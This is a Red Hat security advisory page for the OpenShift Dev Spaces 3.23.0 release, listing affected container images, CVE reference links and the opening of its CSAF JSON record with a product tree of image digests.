Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Important

References

88 references

URL	Category
https://access.redhat.com/errata/RHSA-2025:15847	self
https://access.redhat.com/documentation/en-us/red…	external
https://access.redhat.com/security/cve/CVE-2024-10005	external
https://access.redhat.com/security/cve/CVE-2024-10006	external
https://access.redhat.com/security/cve/CVE-2024-22189	external
https://access.redhat.com/security/cve/CVE-2024-24789	external
https://access.redhat.com/security/cve/CVE-2024-28869	external
https://access.redhat.com/security/cve/CVE-2024-39321	external
https://access.redhat.com/security/cve/CVE-2024-45338	external
https://access.redhat.com/security/cve/CVE-2025-48385	external
https://access.redhat.com/security/cve/CVE-2025-48387	external
https://access.redhat.com/security/cve/CVE-2025-52999	external
https://access.redhat.com/security/cve/CVE-2025-9287	external
https://access.redhat.com/security/cve/CVE-2025-9288	external
https://access.redhat.com/security/updates/classi…	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2024-10005	self
https://bugzilla.redhat.com/show_bug.cgi?id=2322857	external
https://www.cve.org/CVERecord?id=CVE-2024-10005	external
https://nvd.nist.gov/vuln/detail/CVE-2024-10005	external
https://discuss.hashicorp.com/t/hcsec-2024-22-con…	external
https://access.redhat.com/security/cve/CVE-2024-10006	self
https://bugzilla.redhat.com/show_bug.cgi?id=2322858	external
https://www.cve.org/CVERecord?id=CVE-2024-10006	external
https://nvd.nist.gov/vuln/detail/CVE-2024-10006	external
https://discuss.hashicorp.com/t/hcsec-2024-23-con…	external
https://access.redhat.com/security/cve/CVE-2024-22189	self
https://bugzilla.redhat.com/show_bug.cgi?id=2273513	external
https://www.cve.org/CVERecord?id=CVE-2024-22189	external
https://nvd.nist.gov/vuln/detail/CVE-2024-22189	external
https://github.com/quic-go/quic-go/commit/4a99b81…	external
https://github.com/quic-go/quic-go/security/advis…	external
https://seemann.io/posts/2024-03-19-exploiting-qu…	external
https://access.redhat.com/security/cve/CVE-2024-24789	self
https://bugzilla.redhat.com/show_bug.cgi?id=2292668	external
https://www.cve.org/CVERecord?id=CVE-2024-24789	external
https://nvd.nist.gov/vuln/detail/CVE-2024-24789	external
https://access.redhat.com/security/cve/CVE-2024-28869	self
https://bugzilla.redhat.com/show_bug.cgi?id=2274987	external
https://www.cve.org/CVERecord?id=CVE-2024-28869	external
https://nvd.nist.gov/vuln/detail/CVE-2024-28869	external
https://github.com/traefik/traefik/commit/240b83b…	external
https://github.com/traefik/traefik/security/advis…	external
https://access.redhat.com/security/cve/CVE-2024-39321	self
https://bugzilla.redhat.com/show_bug.cgi?id=2296009	external
https://www.cve.org/CVERecord?id=CVE-2024-39321	external
https://nvd.nist.gov/vuln/detail/CVE-2024-39321	external
https://github.com/traefik/traefik/releases/tag/v2.11.6	external
https://github.com/traefik/traefik/releases/tag/v3.0.4	external
https://github.com/traefik/traefik/releases/tag/v…	external
https://github.com/traefik/traefik/security/advis…	external
https://access.redhat.com/security/cve/CVE-2024-45338	self
https://bugzilla.redhat.com/show_bug.cgi?id=2333122	external
https://www.cve.org/CVERecord?id=CVE-2024-45338	external
https://nvd.nist.gov/vuln/detail/CVE-2024-45338	external
https://go.dev/cl/637536	external
https://go.dev/issue/70906	external
https://groups.google.com/g/golang-announce/c/wSC…	external
https://pkg.go.dev/vuln/GO-2024-3333	external
https://access.redhat.com/security/cve/CVE-2025-9287	self
https://bugzilla.redhat.com/show_bug.cgi?id=2389932	external
https://www.cve.org/CVERecord?id=CVE-2025-9287	external
https://nvd.nist.gov/vuln/detail/CVE-2025-9287	external
https://github.com/browserify/cipher-base/pull/23	external
https://github.com/browserify/cipher-base/securit…	external
https://access.redhat.com/security/cve/CVE-2025-9288	self
https://bugzilla.redhat.com/show_bug.cgi?id=2389980	external
https://www.cve.org/CVERecord?id=CVE-2025-9288	external
https://nvd.nist.gov/vuln/detail/CVE-2025-9288	external
https://github.com/browserify/sha.js/pull/78	external
https://github.com/browserify/sha.js/security/adv…	external
https://access.redhat.com/security/cve/CVE-2025-48385	self
https://bugzilla.redhat.com/show_bug.cgi?id=2378808	external
https://www.cve.org/CVERecord?id=CVE-2025-48385	external
https://nvd.nist.gov/vuln/detail/CVE-2025-48385	external
https://github.com/git/git/security/advisories/GH…	external
https://access.redhat.com/security/cve/CVE-2025-48387	self
https://bugzilla.redhat.com/show_bug.cgi?id=2369875	external
https://www.cve.org/CVERecord?id=CVE-2025-48387	external
https://nvd.nist.gov/vuln/detail/CVE-2025-48387	external
https://github.com/mafintosh/tar-fs/commit/647447…	external
https://github.com/mafintosh/tar-fs/security/advi…	external
https://access.redhat.com/security/cve/CVE-2025-52999	self
https://bugzilla.redhat.com/show_bug.cgi?id=2374804	external
https://www.cve.org/CVERecord?id=CVE-2025-52999	external
https://nvd.nist.gov/vuln/detail/CVE-2025-52999	external
https://github.com/FasterXML/jackson-core/pull/943	external
https://github.com/FasterXML/jackson-core/securit…	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat OpenShift Dev Spaces 3.23.0 has been released.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development. The 3.23 release is based on Eclipse Che 7.107 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2. Users still using the v1 standard should migrate as soon as possible. https://devfile.io/docs/2.2.0/migrating-to-devfile-v2 Dev Spaces supports OpenShift EUS releases v4.14 and higher. Users are expected to update to supported OpenShift releases in order to continue to get Dev Spaces updates. https://access.redhat.com/support/policy/updates/openshift#crw",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2025:15847",
        "url": "https://access.redhat.com/errata/RHSA-2025:15847"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.23/html/administration_guide/installing-devspaces",
        "url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.23/html/administration_guide/installing-devspaces"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-10005",
        "url": "https://access.redhat.com/security/cve/CVE-2024-10005"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-10006",
        "url": "https://access.redhat.com/security/cve/CVE-2024-10006"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-22189",
        "url": "https://access.redhat.com/security/cve/CVE-2024-22189"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-24789",
        "url": "https://access.redhat.com/security/cve/CVE-2024-24789"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-28869",
        "url": "https://access.redhat.com/security/cve/CVE-2024-28869"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-39321",
        "url": "https://access.redhat.com/security/cve/CVE-2024-39321"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2024-45338",
        "url": "https://access.redhat.com/security/cve/CVE-2024-45338"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-48385",
        "url": "https://access.redhat.com/security/cve/CVE-2025-48385"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-48387",
        "url": "https://access.redhat.com/security/cve/CVE-2025-48387"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-52999",
        "url": "https://access.redhat.com/security/cve/CVE-2025-52999"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-9287",
        "url": "https://access.redhat.com/security/cve/CVE-2025-9287"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-9288",
        "url": "https://access.redhat.com/security/cve/CVE-2025-9288"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_15847.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.23.0 Release.",
    "tracking": {
      "current_release_date": "2026-05-29T18:40:30+00:00",
      "generator": {
        "date": "2026-05-29T18:40:30+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "4.8.1"
        }
      },
      "id": "RHSA-2025:15847",
      "initial_release_date": "2025-09-15T16:27:40+00:00",
      "revision_history": [
        {
          "date": "2025-09-15T16:27:40+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2025-09-15T16:27:51+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-05-29T18:40:30+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
                "product": {
                  "name": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
                  "product_id": "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:openshift_devspaces:3.23::el9"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat OpenShift Dev Spaces (RHOSDS)"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
                  "product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/code-rhel9@sha256%3A2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757618807"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
                  "product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/configbump-rhel9@sha256%3Ad2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756506343"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
                  "product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/dashboard-rhel9@sha256%3A905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757019057"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
                  "product_id": "registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/idea-rhel9@sha256%3Adf24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e?arch=amd64\u0026repository_url=registry.redhat.io/devspaces-tech-preview\u0026tag=3.23-1756504289"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
                  "product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/imagepuller-rhel9@sha256%3Aa69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756507311"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
                  "product_id": "registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3Aac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8?arch=amd64\u0026repository_url=registry.redhat.io/devspaces-tech-preview\u0026tag=3.23-1757019334"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
                  "product_id": "registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/machineexec-rhel9@sha256%3Ad23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756509551"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
                  "product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/openvsx-rhel9@sha256%3A6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757017659"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
                  "product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756828766"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
                  "product_id": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/devspaces-operator-bundle@sha256%3Aa48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757629825"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
                  "product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/pluginregistry-rhel9@sha256%3A918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757367052"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
                  "product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/server-rhel9@sha256%3A27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756753588"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
                  "product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/traefik-rhel9@sha256%3A15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1756504388"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
                  "product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-rhel9@sha256%3A65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757028609"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
                "product": {
                  "name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
                  "product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/udi-base-rhel9@sha256%3A42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64?arch=amd64\u0026repository_url=registry.redhat.io/devspaces\u0026tag=3.23-1757037884"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
                "product": {
                  "name": "registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
                  "product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
                  "product_identification_helper": {
